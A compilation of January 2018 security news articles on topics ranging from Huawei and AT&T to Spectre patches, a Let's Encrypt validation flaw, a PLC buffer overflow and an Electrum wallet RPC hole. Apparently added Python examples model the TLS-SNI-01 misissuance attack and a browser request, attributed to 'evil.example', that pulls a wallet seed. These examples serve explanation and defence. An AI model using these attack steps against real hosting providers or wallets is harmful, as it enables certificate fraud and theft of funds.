English Articles -

AT&T Backs Away From Deal to Supply China-Made Huawei Phones
11.1.2018 securityweek IT
AT&T has reportedly walked away from a deal to provide U.S. customers with new mobile phones made by Chinese technology giant Huawei.

Based in Shenzhen, China, Huawei announced in December 2017 that it would be supplying smartphones via U.S. carriers this year; and it was widely expected that a deal would be announced during the CES Huawei Keynote speech in Las Vegas on Tuesday.

But just one day earlier, The Wall Street Journal reported that AT&T had backed out of the deal under political pressure. Members of the U.S. Senate and House intelligence committees had apparently written to the FCC on December 20, 2017, noting concerns over "Chinese espionage in general, and Huawei's role in that espionage in particular."

It is assumed that this led to political pressure on AT&T to abandon the deal, and it is believed that Verizon is under similar pressure not to conclude a deal with Huawei later in the year. Huawei has been persona non grata in U.S. official channels since a 2012 Congressional report raised concerns over possible state-sponsored espionage delivered via Huawei communications equipment.

Huawei has always denied any involvement with the Chinese government, and the U.S. is almost alone in 'banning' (effectively, if not legally) Huawei equipment. Similar concerns in the UK government have to a large extent been mitigated by the ability to examine hardware and reverse engineer software under GCHQ oversight at a facility known as The Cell in Banbury, near Oxford.

There is little official comment about what happened this week. From the comments of Huawei's consumer business unit CEO Richard Yu on Tuesday, it seems that Huawei blames AT&T for the breakdown of the deal. "It's a big loss for consumers," he told his audience, "because they don't have the best choice for devices."

Although entering the market late, Huawei is already the world's third largest supplier of smartphones, behind only Samsung and Apple. Access to the huge American market, where by far the majority of phones are provided by the carriers, will now be seriously limited. It is worth noting that there is no legal ban on Huawei phones, and the Chinese company will still sell them to American consumers through online outlets such as Amazon.

There are some similarities with the US government ban on Russia's Kaspersky Lab products. In both cases, concern has been raised over historical ties with the founders' respective governments. Eugene Kaspersky, founder and CEO of Kaspersky Lab, was educated at a KGB-sponsored school and served in the Russian military as a software engineer; while Ren Zhengfei, founder and president of Huawei Technologies Co, is an ex-People's Liberation Army officer. There is concern that both companies could retain covert relations with their respective governments.

There is, however, one very big difference. With Kaspersky Lab, the ban is on its use by federal agencies. With Huawei, the ban is effectively on anyone seeking to acquire Huawei hardware via a phone-and-data-plan from a carrier; that is, the Huawei ban excludes general consumers -- who could pose no national security risk -- from acquiring these phones in the most popular manner.

This in turn has raised some concerns that the pressure on AT&T is more economic and perhaps geopolitical than it is national security. Could it be additional political pressure on China to be more proactive against North Korea? Or could it be a visible manifestation of 'America First' and President Trump's demand that China balance bilateral trade between the two countries?

Either way, it is unlikely to be good for U.S./China relations.

The South China Morning Post today quoted He Weiwen, a former business counselor at the Chinese consulate in New York. "Investment cooperation between China and the U.S. will be squeezed," he said. "China should contemplate countermeasures."

However, at this stage it is only conjecture (however well-informed) that this is a U.S. political move -- without further details it could be an AT&T business decision.

"This might be because there is something preinstalled on the phones that AT&T doesn't agree with; for example, preinstalled software, certificate authority certificates and other things that might yield some kind of data gathering capabilities and/or control either directly or indirectly," noted F-Secure's principal security consultant Tom Van de Wiele. "It might be that Huawei is putting its foot down on the application eco-system and its rules."

He also pointed out further non-political issues that could have scuppered the deal. "The phone might be too 'open' in that it easily allows you to unlock it and switch telcos, away from AT&T -- and that's still a huge thing in the U.S."

Similarly, there are potential security issues with any phone, possibly heightened by Huawei phones using Huawei proprietary chips. "As Android devices come in a multitude of deployments -- it's easier for overly 'curious' features to get included without being noticed," F-Secure's security adviser Sean Sullivan told SecurityWeek. "There have been several cases in which vendors screwed up and included things such as Baidu components in European deployments."

But he added, "These were budget phones; you get the quality that you pay for. In the case of Huawei -- too many eyes are/would be auditing its devices -- it's doubtful that anything deliberate would be done via an AT&T phone." Sullivan is not convinced that the AT&T deal has been shelved for purely security concerns.

This is the second China deal to have been prevented in the last few days. Last week the U.S. Committee on Foreign Investment rejected Chinese firm Ant Financial's takeover bid for U.S.-based money transfer firm MoneyGram -- again citing national security concerns.


NVIDIA Updates GPU Drivers to Mitigate CPU Flaws
11.1.2018 securityweek Vulnerability
NVIDIA has released updates for its GPU display drivers and other products in an effort to mitigate the recently disclosed attack methods dubbed Meltdown and Spectre.

Shortly after researchers revealed the existence of the flaws that allow Meltdown and Spectre exploits, which can be leveraged to gain access to sensitive data stored in a device’s memory, NVIDIA announced that its GPU hardware is “immune,” but the company has promised to update its GPU drivers to help mitigate the CPU issues.

The Meltdown and Spectre vulnerabilities affect processors from Intel, AMD and ARM. Similar to Qualcomm, some of NVIDIA’s system-on-chip (SoC) products rely on ARM CPUs and the company has promised to develop mitigations.

On Tuesday, NVIDIA informed customers about the availability of GPU display driver updates that include mitigations for one of the Spectre vulnerabilities, specifically CVE-2017-5753. The company is still working on determining if the second Spectre flaw, CVE-2017-5715, affects its GPU drivers. On the other hand, there is no indication that the drivers are impacted by the Meltdown vulnerability (CVE-2017-5754).

NVIDIA has provided display driver updates for the Windows and Linux versions of GeForce, Quadro, and NVS graphics cards. In the case of Tesla GPUs, updates have been provided only for the R384 branch, while an update for R390 is expected to become available during the week of January 22. In the case of the GRID virtual GPU solution, updates should become available by the end of the month.

NVIDIA has also released updates for the Android-based Shield TV media player and Shield Tablet, and the Jetson embedded system, which is built around the Tegra mobile processor. The company says only the Jetson TX2 update includes mitigations for all three CPU vulnerabilities – the other updates include mitigations only for CVE-2017-5753 and in some cases CVE-2017-5715 (i.e. the Spectre flaws).

The mitigations for the Meltdown and Spectre vulnerabilities are known to introduce performance penalties for certain types of operations, but NVIDIA has not provided any information on this issue.

Intel says regular users should not see any difference after applying the fixes, but Microsoft’s tests show that most Windows 7 and 8 systems will likely incur significant penalties if they use 2015-era or older CPUs.

Tests conducted by Red Hat also showed significant slowdowns for certain types of operations. However, Amazon, Google and Apple said they had not seen any noticeable performance problems – although some AWS customers did report degraded performance.


Let's Encrypt Disables TLS-SNI-01 Validation
11.1.2018 securityweek Vulnerability
Free and open Certificate Authority (CA) Let’s Encrypt on Tuesday disabled TLS-SNI-01 validation after learning that users could abuse it to obtain certificates for domains they do not own.

The issue stems from the use of the ACME TLS-SNI-01 challenge type for domains on shared hosting infrastructure. Discovered by Frans Rosén of Detectify, the bug could be abused for malicious purposes, which prompted Let’s Encrypt to disable TLS-SNI-01 validation entirely.

The issue doesn’t appear to be related to the certificate authority itself, but to a combination of factors. However, it is centered on the manner in which the ACME server (the CA) validates a domain name’s IP address as part of ACME protocol’s TLS-SNI-01 challenge.

As part of the process, the ACME server generates a random token. The ACME client uses it to create a self-signed certificate for a hostname under the reserved .acme.invalid domain and configures the web server for the domain name to serve that certificate. The ACME server then looks up the domain name’s IP address, initiates a TLS connection to it, sends the specific .acme.invalid hostname in the SNI extension, and expects to receive in response a self-signed certificate containing that hostname.

When that happens, “the ACME client is considered to be in control of the domain name, and will be allowed to issue certificates for it,” Josh Aas, Internet Security Research Group (ISRG) Executive Director, explains.

However, when more users are hosted on the same IP address, which happens with large hosting providers, and these users also have the ability to upload certificates for arbitrary names without proving domain control, the assumptions behind TLS-SNI are broken and an attack is possible.

Thus, if an attacker controls a website hosted at the same shared-hosting IP address as a legitimate site, the attacker can run an ACME client, request a TLS-SNI-01 challenge for the legitimate site’s domain, and obtain a misissued certificate for it.

The attacker simply uploads their .acme.invalid certificate to the hosting provider, which serves it to the ACME server when the server connects to the IP address the legitimate website resolves to. The ACME server then considers the attacker’s ACME client authorized for the legitimate website, and the attack succeeds.

“This issue only affects domain names that use hosting providers with the above combination of properties. It is independent of whether the hosting provider itself acts as an ACME client. It applies equally to TLS-SNI-02,” Aas explains.
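To make the failure concrete, here is an added example (not Let’s Encrypt’s or any hosting provider’s code) that models the validation in Python. The challenge-name derivation follows the ACME draft that defined TLS-SNI-01 (Z = hex SHA-256 of the key authorization, split 32/32 under .acme.invalid); the SharedHost front end, the DNS table, the token and the account thumbprint are hypothetical stand-ins for a real TLS front end and a real CA lookup, and the block_acme_names flag models one provider-side control of the kind Aas refers to, not any particular provider’s implementation.

```python
import hashlib
from typing import Dict, List, Optional, Tuple

ACME_SUFFIX = ".acme.invalid"


def tls_sni_01_name(token: str, account_thumbprint: str) -> str:
    """Hostname the ACME client must present for a TLS-SNI-01 challenge.

    The ACME draft that defined TLS-SNI-01 derives it from the key authorization
    (token "." JWK thumbprint): Z = hex(SHA-256(key authorization)), and the
    certificate's SAN is Z[0:32] "." Z[32:64] ".acme.invalid".
    """
    key_authorization = f"{token}.{account_thumbprint}".encode("ascii")
    z = hashlib.sha256(key_authorization).hexdigest()
    return f"{z[:32]}.{z[32:]}{ACME_SUFFIX}"


class SharedHost:
    """Toy model (hypothetical) of a shared-hosting TLS front end.

    One IP address fronts many tenants; the front end picks the certificate by
    the SNI name in the ClientHello.  The weak property behind the bug: a tenant
    can upload a certificate for any name without proving control of it.
    """

    def __init__(self, block_acme_names: bool = False) -> None:
        # Provider-side control: refuse tenant certificates for *.acme.invalid.
        self.block_acme_names = block_acme_names
        self.sni_table: Dict[str, Tuple[str, List[str]]] = {}  # SNI name -> (tenant, SANs)

    def upload_cert(self, tenant: str, san_names: List[str]) -> None:
        for name in san_names:
            if self.block_acme_names and name.endswith(ACME_SUFFIX):
                raise PermissionError(f"{tenant} may not bind a certificate to {name}")
            self.sni_table[name] = (tenant, list(san_names))

    def serve(self, sni_name: str) -> Optional[List[str]]:
        """SAN list of the certificate returned for this SNI, or None if unknown."""
        entry = self.sni_table.get(sni_name)
        return entry[1] if entry else None


def acme_server_validate(dns: Dict[str, SharedHost], domain: str,
                         token: str, thumbprint: str) -> bool:
    """The CA side of TLS-SNI-01: resolve the domain, connect with the challenge
    SNI, and accept if the presented certificate carries that name."""
    expected = tls_sni_01_name(token, thumbprint)
    front_end = dns[domain]            # "look up the domain name's IP address"
    sans = front_end.serve(expected)   # "send the invalid hostname" via SNI
    return sans is not None and expected in sans


def run_scenario(block_acme_names: bool) -> bool:
    """Attacker and victim share one front end; the attacker runs an ACME client
    asking for victim.example.  Returns True if the CA would issue."""
    front_end = SharedHost(block_acme_names=block_acme_names)
    # Both names resolve to the same shared IP (constructed DNS table).
    dns = {"victim.example": front_end, "attacker.example": front_end}
    front_end.upload_cert("victim", ["victim.example"])

    # Challenge token and attacker account thumbprint are constructed values.
    token = "evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA"
    attacker_thumbprint = "attacker-account-key-thumbprint"
    challenge_name = tls_sni_01_name(token, attacker_thumbprint)
    try:
        # The attacker needs no access to victim.example, only to the front end.
        front_end.upload_cert("attacker", [challenge_name])
    except PermissionError:
        return False  # the provider control stopped the attack
    return acme_server_validate(dns, "victim.example", token, attacker_thumbprint)


if __name__ == "__main__":
    print("unrestricted provider, attacker validated for victim.example:", run_scenario(False))
    print("provider blocks *.acme.invalid uploads:", run_scenario(True))
```

The point the model makes is that nothing in the CA’s check ties the certificate it receives to the tenant who owns the domain; it only ties it to whoever can make the shared IP present a name under .acme.invalid. That is why the fix belongs with the provider (or with a different challenge type), not with the CA alone.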

Let’s Encrypt disabled TLS-SNI-01 immediately after becoming aware of the issue, but plans on restoring the service as soon as possible, given that a large number of people and organizations use the TLS-SNI-01 challenge type to get certificates. However, they won’t enable it until they consider it sufficiently secure.

“At this time, we believe that the issue can be addressed by having certain services providers implement stronger controls for domains hosted on their infrastructure. We have been in touch with the providers we know to be affected, and mitigations will start being deployed for their systems shortly,” Aas notes.

Let’s Encrypt is also working on creating a list of vulnerable providers and associated IP addresses and to re-enable the TLS-SNI-01 challenge type with vulnerable providers blocked from using it.


IBM Starts Patching Spectre, Meltdown Vulnerabilities
10.1.2018 securityweek Vulnerability
IBM has started releasing firmware patches for its POWER processors to address the recently disclosed Meltdown and Spectre vulnerabilities. The company is also working on updates for its operating systems, but those are expected to become available only next month.

On January 4, one day after researchers disclosed the Meltdown and Spectre attack methods against Intel, AMD and ARM processors, IBM informed customers that it had started analyzing impact on its own products. On Tuesday, the company revealed that its POWER processors are affected.

IBM told customers that attacks against its Power Systems server line can be fully mitigated only by installing both firmware and operating system patches.

The company has already released firmware patches for its POWER7+ and POWER8 processors, and fixes are expected to become available for POWER9 systems on January 15. Users of earlier products that are still supported will be notified at a later time about the availability of firmware updates.

Users whose devices run Linux can obtain operating system patches from their respective vendors. Red Hat, SUSE and Canonical have already released fixes. As for IBM’s own operating systems, namely AIX and IBM i, patches are expected to become available on February 12.

“If this vulnerability poses a risk to your environment, then the first line of defense is the firewalls and security tools that most organizations already have in place,” IBM explained.

The company has told customers that IBM storage appliances are not impacted by the vulnerabilities.

The mitigations for the Meltdown and Spectre vulnerabilities are known to introduce performance penalties for certain types of operations, but IBM has not mentioned anything about performance impact.

Intel says regular users should not see any difference after applying the fixes, but Microsoft’s tests show that most Windows 7 and 8 systems will likely incur significant penalties if they use 2015-era or older CPUs.

In addition to performance penalties, some mitigations also cause problems due to compatibility issues. Microsoft has required security product vendors to set a specific registry key in order for their customers to receive security updates. Furthermore, one of the company’s updates has been found to break computers with some older AMD processors.


Industrial Cybersecurity Firm Nozomi Networks Raises $15 Million
10.1.2018 securityweek ICS
Industrial cybersecurity firm Nozomi Networks has raised $15 million in a Series B funding round, the company announced Wednesday. The new funding brings the total amount raised by the company to date to $23.8 million.

Nozomi’s flagship offering, SCADAguardian, employs machine learning and behavioral analysis to detect zero-day attacks in real time, while integration with firewalls, SIEMs, and ICS incident alerting and notification systems allows rapid response to alerts.

The company said the additional funding will be used to support worldwide expansion of marketing, sales and support and further bolster product innovation.

Nozomi Networks Exhibits at SecurityWeek's 2017 ICS Cyber Security Conference in Atlanta (Image Credit: SecurityWeek)
The company claims to be rapidly gaining new customers across 5 continents, with more than 200 deployments that span energy, manufacturing, pharmaceuticals, chemicals, mining, utilities and other sectors.

“Now is a prudent time for funding to meet this exploding market opportunity,” said Nozomi Networks CEO Edgard Capdevielle. “We resisted the temptation of raising too much funding before our product leadership was established.”

“FireEye’s recent discovery of Triton malware in the wild highlights how critical infrastructure facilities are increasingly at risk. After extensive testing, we've partnered with Nozomi Networks because they provide the right solution customers need to detect these attacks at the earliest stages and minimize the impact before the safety and reliability of their critical operations is threatened,” Grady Summers, CTO at FireEye, said in a statement.

The Invenergy Future Fund led the Series B round with participation from THI Investments and all existing investors, GGV Capital, Lux Capital and Planven Investments SA. Nozomi previously raised $7.5 million in a Series A funding round in late 2016.

Nozomi is one of several security startups targeting the industrial space that have recently raised funding. Others include Dragos, Indegy, Bayshore Networks, CyberX, Claroty, and SCADAFence. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, recently raised $75 million at a valuation of $825 million.


Rockwell Automation Patches Serious Flaw in MicroLogix 1400 PLC
10.1.2018 securityweek Vulnerability
A firmware update released a few weeks ago by Rockwell Automation for its MicroLogix 1400 programmable logic controllers (PLCs) patches a potentially serious vulnerability.

The MicroLogix PLC family is used worldwide by organizations in the critical infrastructure, food and agriculture, and water and wastewater sectors for controlling processes.

Thiago Alves from the University of Alabama in Huntsville (UAH) discovered that these controllers are affected by a buffer overflow vulnerability. In 2016, Alves and two other UAH researchers published a paper on using virtual testbeds for industrial control systems (ICS).

Rockwell Automation MicroLogix 1400 PLC

According to Rockwell Automation, the expert discovered that several MicroLogix 1400 PLCs running version 21.002 and earlier of the firmware are affected by a buffer overflow vulnerability that can be triggered by sending specially crafted Modbus TCP packets to affected devices. The flaw can be exploited remotely by an unauthenticated attacker.

“The Modbus buffer is not deallocated when a packet exceeds a specific length. Repeated sending of Modbus TCP data can cause a denial of service to the Modbus functionality, and potentially cause the controller to fault,” the vendor explained.

The security hole is tracked as CVE-2017-16740 and it has been classified by both Rockwell and ICS-CERT as high severity with a CVSS score of 8.6. While Rockwell’s advisory only mentions DoS attacks, ICS-CERT’s advisory says it may also be possible to exploit the flaw for remote code execution.

Rockwell Automation patched the vulnerability last month with the release of firmware version 21.003 for series B and series C hardware. As a workaround, users can disable Modbus TCP support if it’s not needed, which removes the vulnerable service from the network.
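The advisory gives no detail beyond "a packet exceeds a specific length", and the example below does not try to trigger the flaw. It is an added, illustrative Python check of the kind a network sensor in front of a PLC would run, not Rockwell’s code: it re-frames a Modbus TCP stream using the MBAP length field and flags ADUs whose length field exceeds the protocol maximum (253-byte PDU plus unit identifier), disagrees with the bytes on the wire, or carries a non-Modbus protocol identifier. The sample frames are constructed, not captured from a MicroLogix controller.

```python
import struct
from typing import List, Optional

MBAP_LEN = 7                     # transaction id (2), protocol id (2), length (2), unit id (1)
MAX_PDU = 253                    # Modbus Application Protocol spec: a PDU is at most 253 bytes
MAX_LENGTH_FIELD = MAX_PDU + 1   # the length field counts unit id + PDU


def check_modbus_tcp_frame(frame: bytes) -> Optional[str]:
    """Return None for a well-formed Modbus TCP ADU, otherwise the reason it is not."""
    if len(frame) < MBAP_LEN + 1:
        return "truncated: shorter than MBAP header plus function code"
    _tid, proto, length, _unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if proto != 0:
        return f"protocol id {proto} is not Modbus (0)"
    if length < 2:
        return f"length field {length} cannot hold unit id and function code"
    if length > MAX_LENGTH_FIELD:
        return f"length field {length} exceeds Modbus maximum {MAX_LENGTH_FIELD}"
    on_wire = len(frame) - 6
    if on_wire != length:
        return f"length field {length} disagrees with {on_wire} bytes on the wire"
    function_code = frame[MBAP_LEN]
    if function_code == 0 or function_code > 127:
        return f"function code {function_code} is not a valid request"
    return None


def split_adus(stream: bytes) -> List[bytes]:
    """Cut a reassembled TCP byte stream into Modbus ADUs using the MBAP length field.

    Modbus TCP carries many ADUs per connection, so a sensor must re-frame the
    stream.  At the first implausible length field the remainder is returned as
    one frame: framing cannot be trusted past that point, and that remainder is
    exactly what the checker should flag.
    """
    adus: List[bytes] = []
    offset = 0
    while offset + MBAP_LEN <= len(stream):
        (length,) = struct.unpack(">H", stream[offset + 4:offset + 6])
        end = offset + 6 + length
        if length < 2 or length > MAX_LENGTH_FIELD or end > len(stream):
            adus.append(stream[offset:])
            break
        adus.append(stream[offset:end])
        offset = end
    return adus


def inspect_stream(stream: bytes) -> List[str]:
    """Reasons for every malformed ADU in the stream (empty list means all clean)."""
    reasons = []
    for adu in split_adus(stream):
        reason = check_modbus_tcp_frame(adu)
        if reason is not None:
            reasons.append(reason)
    return reasons


# Constructed sample traffic, not a capture from a real controller.
# Read Holding Registers (0x03), unit 1, start 0, quantity 10: a normal poll.
GOOD_POLL = bytes.fromhex("0001" "0000" "0006" "01" "03" "0000" "000a")
# A frame whose MBAP length field claims 1024 bytes, four times the protocol maximum.
OVERSIZED = struct.pack(">HHHB", 2, 0, 1024, 1) + b"\x10" + b"\x00" * 1022

if __name__ == "__main__":
    print(inspect_stream(GOOD_POLL + GOOD_POLL))   # []
    print(inspect_stream(GOOD_POLL + OVERSIZED))   # ['length field 1024 exceeds Modbus maximum 254']
```

Such a check only sees what the sensor sees: if the PLC reads beyond the MBAP-declared length (which a "not deallocated" buffer suggests), byte-level oversize on the wire rather than the length field may be the better signal, so a real deployment would alert on both. Neither replaces the firmware update or disabling Modbus TCP where it is not needed.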

Last month, after discovering a serious DoS vulnerability in several product lines from Siemens, experts at industrial cybersecurity firm CyberX pointed out that these types of flaws should not be taken lightly.

“The December 2016 attack on the Ukrainian electrical grid used this type of exploit to disable protection relays and make it more difficult for operators to recover,” the company told SecurityWeek at the time.


Android Malware Developed in Kotlin Programming Language Found in Google Play
10.1.2018 securityweek Android
Security researchers at Trend Micro have discovered a malicious application in Google Play that was developed using the Kotlin programming language.

Detected as ANDROIDOS_BKOTKLIND.HRX, the malicious program was masquerading as Swift Cleaner, a utility designed to clean and optimize Android devices. The application had between 1,000 and 5,000 installs when discovered.

Kotlin, developed by JetBrains, was announced by Google as a first-class language for writing Android apps in May 2017. It is open source and is already used by 17% of Android Studio projects. Some of the top applications using the language include Twitter, Pinterest, and Netflix.

Developers using Kotlin can deliver safer applications, due to avoiding entire classes of errors, and can also ensure their software is interoperable by taking advantage of existing libraries for JVM, Android, and the browser. What’s yet uncertain is how malware developers can leverage the programming language when building nefarious code.

The discovered malicious application, Trend Micro says, can engage in a broad range of nefarious activities, including remote command execution. It is also capable of stealing users’ information, sending SMS messages, forwarding URLs, and performing click ad fraud. Furthermore, it has been designed to sign up users for premium SMS subscription services without their permission.

When first launched, the malware sends device information to a remote server and starts a background service to receive tasks from the command and control (C&C) server. Upon the initial infection, the malware also sends a message to a specified number provided by the C&C.

Upon receiving SMS commands, the remote server starts executing URL forwarding and click ad fraud operations on the infected device.

During the click ad fraud routine, the malware uses Wireless Application Protocol (WAP), a technical standard for accessing information over a mobile wireless network. Next, malicious JavaScript code is injected and regular expressions are replaced, so that the malicious actors can parse the ads’ HTML code in a specific search string.

“Subsequently, it will silently open the device’s mobile data, parse the image base64 code, crack the CAPTCHA, and send the finished task to the remote server,” Trend Micro explains.

The malicious program can send information on the service provider, login data, and CAPTCHA images to the C&C server. Once such information is uploaded, the C&C server automatically processes a premium SMS service subscription, which can cost the victim money.

To stay protected from such threats, both end users and enterprise customers are advised to install and maintain a security solution on their devices.

According to Trend Micro, Google was informed of the security risk the Swift Cleaner application poses, and the company verified that Google Play Protect can keep users safe from this malware family.


SAP Publishes Light Patch Day for January 2018
10.1.2018 securityweek Vulnerability
SAP this week released its monthly set of security patches to address just three vulnerabilities in its products, all three rated Medium severity.

In addition to the three security notes, the January 2018 SAP Security Patch Day includes four updates to previously released security notes. These too had a Medium severity rating, the company said.

The most severe of the patches was an update to a security note originally released in October 2014, addressing a code injection bug in Knowledge Provider. The issue is tracked as CVE-2018-2363 and has a CVSS score of 6.5.

“Depending on the code, attackers can inject and run their own code, obtain additional information that should not be displayed, change and delete data, modify the output of the system, create new users with higher privileges, control the behavior of the system, or escalate privileges by executing malicious code or even perform a DOS attack,” ERPScan, a company that specializes in securing SAP and Oracle products, explains.

SAP also released an update to a security note released in December 2017, addressing CVE-2017-16690, a DLL preload attack possible on NwSapSetup and Installation self-extracting program for SAP Plant Connectivity (CVSS score 5.0).

Newly resolved issues include CVE-2018-2361, an Improper Role Authorizations in SAP Solution Manager 7.2 (CVSS score 6.3), CVE-2018-2360, Missing Authentication check in Startup Service (CVSS score 5.8), and CVE-2018-2362, Information Disclosure in Startup Service in SAP HANA (CVSS score 5.3).

By exploiting CVE-2018-2360, an attacker could access a service “without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation and other attacks,” ERPScan reveals.

CVE-2018-2361’s exploitation could provide an attacker with the possibility to edit all tables on the server, which could result in data compromise, the company continues.

ERPScan, which considers the code injection security note updates as a single patch, says that 10 SAP Security Notes (5 SAP Security Patch Day Notes and 5 Support Package Notes) were closed with the January 2018 SAP Security Patch Day. 3 were updates to previous security notes and 5 were released after the second Tuesday of the previous month and before the second Tuesday of this month.


Electrum patches a critical flaw that has exposed Bitcoin wallets to theft since 2016
10.1.2018 securityaffairs Vulnerability

The development team behind the popular Electrum Bitcoin wallet app has issued an emergency patch for a critical vulnerability in the company bitcoin wallets.
Electrum is a free application that’s used by many cryptocurrency sites to store bitcoin. Administrators can run their own Electrum server and the software supports hardware wallets such as Trezor, Ledger and Keepkey.

The vulnerability allowed any website visited while the Electrum wallet was running to potentially steal the user’s cryptocurrency.

The flaw appears to have been present in the software for almost two years; it stems from the wallet’s JSON-RPC interface being left without password protection.

Electrum’s first security patch failed to address the issue, so the project issued a second update on Sunday evening.

The story began in November, when researchers observed massive scans for Bitcoin and Ethereum wallets aimed at stealing their funds.

The security expert Didier Stevens observed a significant scanning activity over the weekend, just two days before Bitcoin price jumped from $7,000 to over $8,000.

The researcher observed a huge number of requests to his honeypot attempting to retrieve Bitcoin wallet files.

The crooks were, of course, also exploring other cryptocurrencies such as Ethereum. BleepingComputer.com published an interesting analysis of a related discovery made by researcher Dimitrios Slamaris.

The security expert reported Internet-wide Ethereum JSON-RPC scans.

The expert caught a JSON-RPC call in his honeypot: someone was sending requests to the JSON-RPC interface of Ethereum nodes, an interface that should only be exposed locally.

The interface does not implement any authentication mechanism; wallet apps installed on the PC send commands to the Ethereum client through it to manage funds. If the interface is exposed online, attackers can send requests to it and issue commands to move funds to an attacker-controlled wallet.

In early November, Slamaris uncovered another massive scan in which the attacker stole 8 Ether (about $3,200 at the exchange rate at the time).

Slamaris, together with SANS Internet Storm Center expert Johannes Ullrich, also uncovered a second campaign in which two IP addresses were scanning especially hard with these requests:
216.158.238.186 – Interserver Inc. (a New Jersey hosting company)
46.166.148.120 – NFOrce Entertainment BV (a Dutch hosting company)
A user going by the name of “jsmad” noticed that the Electrum wallet app was also exposing a similar JSON RPC online.

“The JSONRPC interface is currently completely unprotected, I believe it should be a priority to add at least some form of password protection.” wrote the user.

“Scans for the JSONRPC interface of Ethereum wallets have already started:
https://www.bleepingcomputer.com/news/security/theres-some-intense-web-scans-going-on-for-bitcoin-and-ethereum-wallets/“

Without a password on the JSON-RPC interface, or with one weak enough to be brute-forced, attackers could interact with the wallets through it.

Google white hat hacker Tavis Ormandy, who contacted the project, criticized the Electrum developers for their handling of the issue.

“Hello, I’m not a bitcoin user, a colleague pointed me at this bug report because localhost RPC servers drive me crazy 😛.” wrote Ormandy.

“I installed Electrum to look, and I’m confused why this isn’t being treated as a critical and urgent vulnerability? If this bug wasn’t already open for months, I would have reported this as a vulnerability, but maybe I misunderstand something.

The JSON RPC server is enabled by default, it does use a random port but a website can simply scan for the right port in seconds.

I made you a demo. It’s very basic, but you get the idea. If you did set a password, some misdirection is required, but it’s still game over, no?

Here is how I reproduced:

Install Electrum 3.0.3 on Windows.
Create a new wallet, all default settings. I left the wallet password blank – the default setting.
Visit in Chrome.
Wait a few seconds while it guesses the port, then an alert() appears with:
seed: {"id": 0.7398595146147573, "result": "pony south strike horror throw acquire able afford pen lunch monster runway", "jsonrpc": "2.0"}
(Note: I don't use bitcoin, you can steal my empty wallet if you like)”

In a real attack scenario, hackers could trick Electrum users into accessing a malicious website that could scan for the Electrum’s random JSON RPC port and empty the wallet by issuing commands.
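To show the difference between the exposed interface Ormandy describes and a locked-down one, here is an added Python example that is not Electrum’s code. It models a wallet’s localhost JSON-RPC dispatcher in two configurations: with require_auth=False any caller that finds the port is served, which is the situation described above; with require_auth=True the dispatcher demands a random per-launch credential that a web page cannot know, and refuses any request carrying an Origin header, which browser-initiated requests always do. The method names, the demo seed and the requests are constructed for the demo; the Origin refusal is a defence-in-depth choice of this example, not a claim about what Electrum 3.0.5 implements.

```python
import base64
import hmac
import json
import secrets
from typing import Any, Dict

# Constructed wallet state for the demo; not a real seed.
DEMO_SEED = "constructed demo seed words only never fund this wallet"


def _jsonrpc_result(rid: Any, result: Any) -> Dict[str, Any]:
    return {"jsonrpc": "2.0", "id": rid, "result": result}


def _jsonrpc_error(rid: Any, code: int, message: str) -> Dict[str, Any]:
    return {"jsonrpc": "2.0", "id": rid, "error": {"code": code, "message": message}}


class LocalWalletRpc:
    """Dispatcher for a wallet's localhost JSON-RPC endpoint (illustrative, not Electrum's code).

    require_auth=False reproduces the exposed shape: whoever finds the port is served.
    require_auth=True applies two controls: a random per-launch credential (which a
    web page cannot know) and refusal of any request that carries an Origin header,
    which every browser-initiated request does.
    """

    def __init__(self, require_auth: bool) -> None:
        self.require_auth = require_auth
        self.user = "wallet"
        # Generated fresh each launch; only processes that can read the wallet's
        # own config file learn it.  Empty when the interface is left open.
        self.password = secrets.token_urlsafe(32) if require_auth else ""

    def _authorized(self, headers: Dict[str, str]) -> bool:
        auth = headers.get("authorization", "")
        if not auth.startswith("Basic "):
            return False
        try:
            decoded = base64.b64decode(auth[len("Basic "):], validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return False
        user, _, password = decoded.partition(":")
        # Constant-time comparison so a guessing client learns nothing from timing.
        return user == self.user and hmac.compare_digest(password.encode(), self.password.encode())

    def handle(self, headers: Dict[str, str], body: str) -> Dict[str, Any]:
        headers = {k.lower(): v for k, v in headers.items()}
        try:
            request = json.loads(body)
        except ValueError:
            return _jsonrpc_error(None, -32700, "parse error")
        rid = request.get("id")
        if self.require_auth:
            if "origin" in headers:
                return _jsonrpc_error(rid, 403, "browser-originated request refused")
            if not self._authorized(headers):
                return _jsonrpc_error(rid, 401, "authentication required")
        method = request.get("method")
        if method == "getseed":
            return _jsonrpc_result(rid, DEMO_SEED)
        if method == "payto":
            params = request.get("params") or {}
            return _jsonrpc_result(rid, f"would pay {params.get('amount')} to {params.get('destination')}")
        return _jsonrpc_error(rid, -32601, "method not found")


def basic_auth_header(user: str, password: str) -> Dict[str, str]:
    """Build the Authorization header a legitimate local client would send."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return {"Authorization": f"Basic {token}"}


if __name__ == "__main__":
    # What a malicious page sends once it has guessed the port (constructed request).
    from_browser = {"Origin": "http://evil.example"}
    body = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "getseed"})

    exposed = LocalWalletRpc(require_auth=False)
    print(exposed.handle(from_browser, body))          # seed handed straight to the page

    hardened = LocalWalletRpc(require_auth=True)
    print(hardened.handle(from_browser, body))         # error 403
    print(hardened.handle({}, body))                   # error 401: local, but no credential
    print(hardened.handle(basic_auth_header("wallet", hardened.password), body))  # result
```

The random port alone buys nothing, as Ormandy notes, because a page can probe the port range in seconds; the credential is what changes the picture, since a page cannot read the wallet’s config file, and a password chosen by the user can be brute-forced through the same channel unless the server also throttles failures.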

Below is a video of such an attack shared by Twitter user @h43z on January 7, 2018:

"Update your #electrum wallets. Only having the program running and surfing the web can be unsafe. Any website can steal your wallet if it is not protected with a password, or if it's easy to guess it can be brute-forced. #bitcoin"
The Electrum development team has released version 3.0.5, which addresses the vulnerability; users are urged to update their wallet app.

According to the developers, the flaw affects versions 2.6 to 3.0.4 of Electrum, on all platforms. It also affects clones of Electrum such as Electron Cash.

“In addition, the vulnerability allows an attacker to modify user settings, the list of contacts in a wallet, and the “payto” and “amount” fields of the user interface while Electrum is running.” reads the analysis published by the Electrum development team.

